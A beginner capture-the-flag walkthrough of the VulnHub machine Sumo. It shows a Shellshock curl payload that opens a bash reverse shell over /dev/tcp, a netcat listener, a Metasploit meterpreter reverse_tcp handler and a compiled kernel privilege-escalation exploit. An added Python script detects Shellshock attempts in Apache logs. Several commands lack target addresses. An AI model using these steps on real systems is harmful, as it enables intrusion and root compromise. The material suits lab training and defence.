Sumo Vulnhub Walkthrough

In this article, we work through another VulnHub box, Sumo, created by the SunCSR Team. This VM is beginner level. You can download it here: sumo: 1 CTF


The goal is to get a root shell (i.e. root@localhost:~#) and then obtain the flag under /root.

Network Scanning

First, we discover the target's IP address using the netdiscover tool.


Now that we have the target IP address, the next step is to scan the target machine's ports and services with an nmap aggressive scan (-A).

nmap -A


The target has two open ports: 22 (SSH) and 80 (HTTP). For enumeration, we open the HTTP service in a web browser.

The site gives us no clue about what to do next, so we run the Nikto web vulnerability scanner.

nikto --url

The Nikto scan finds the directory /cgi-bin/test, which is vulnerable to the Shellshock exploit. Before executing the curl command, we first start our netcat listener.

curl -v -A "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/" 0>&1' "
nc -lvp 4545
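
A defender's view of the step above, as an added example that is not part of the original walkthrough: a Python check that scans Apache combined-format access logs for a Referer or User-Agent value starting with a bash function definition, the marker of a Shellshock attempt. The log lines, IP addresses, and the function name find_shellshock_attempts are constructed for illustration, and the /cgi-bin/ prefix test is an assumed heuristic for spotting CGI requests.

```python
import re

# Apache "combined" format: ip ident user [time] "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# Shellshock hinges on a header value that begins with a bash function
# definition, "() {", with optional whitespace between the tokens.
FUNC_DEF_RE = re.compile(r'^\s*\(\s*\)\s*\{')

# Constructed sample log lines (documentation IP ranges), not taken from the walkthrough.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 177 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/test HTTP/1.1" 200 14 "-" "curl/7.68.0"
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/test HTTP/1.1" 200 0 "-" "() { :;}; echo probe"
198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 177 "() { :; }; echo probe" "curl/7.68.0"
""".splitlines()

def find_shellshock_attempts(lines):
    """Return one finding per line whose Referer or User-Agent starts with a function definition."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not in combined format; skipped rather than guessed at
        hit = [h for h in ("referer", "agent") if FUNC_DEF_RE.match(m.group(h))]
        if not hit:
            continue
        parts = m.group("request").split()
        path = parts[1] if len(parts) > 1 else ""
        findings.append({
            "line": lineno,
            "ip": m.group("ip"),
            "path": path,
            "headers": hit,
            "status": int(m.group("status")),
            # Assumed heuristic: only CGI requests pass headers into bash's environment.
            "cgi": path.startswith("/cgi-bin/"),
        })
    return findings

if __name__ == "__main__":
    for finding in find_shellshock_attempts(SAMPLE_LOG):
        print(finding)
```

A hit on a CGI path deserves priority, since that is where the header value actually reaches bash; whether it executed depends on the bash version behind the script.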

After executing the curl command, we have a reverse shell on the target machine. We try to find a SUID binary but fail, so we run the uname -r command, which shows the target machine's kernel version.

This kernel version is vulnerable to the ‘perf_swevent_init’ local privilege escalation. We move to the /tmp directory and download the exploit.

uname -r

Then we compile the exploit, but compilation fails with an error: gcc: error trying to exec ‘cc1’ : execvp:

chmod 777 kernal.c
gcc kernal.c -O2 -o hackNos

Now we have a bigger problem: after compiling the exploit, our VM crashes. Next, we create a Linux meterpreter reverse payload and use the wget command to download it into the target machine's /tmp directory.

Then we run msfconsole, load the multi/handler module, and set up a listener for the Linux meterpreter payload.

msfconsole -x "use exploit/multi/handler"
set payload linux/x86/meterpreter/reverse_tcp
set lhost
set lport 4444

With the Metasploit listener started, we make the payload executable and then run it with the following command.

chmod +x payload.elf && ./payload.elf
python -c 'import pty;pty.spawn("/bin/bash")'

We go back to the /tmp directory, recompile the exploit, give all users read, write, and execute permission on it, and run the exploit.

gcc kernal.c -O2 -o hackNos
chmod 777 hackNos && ./hackNos 0

Our exploit runs successfully and we get a root shell on the target machine, so let’s move to the /root directory and read the root.txt flag.

cd /root
cat root.txt
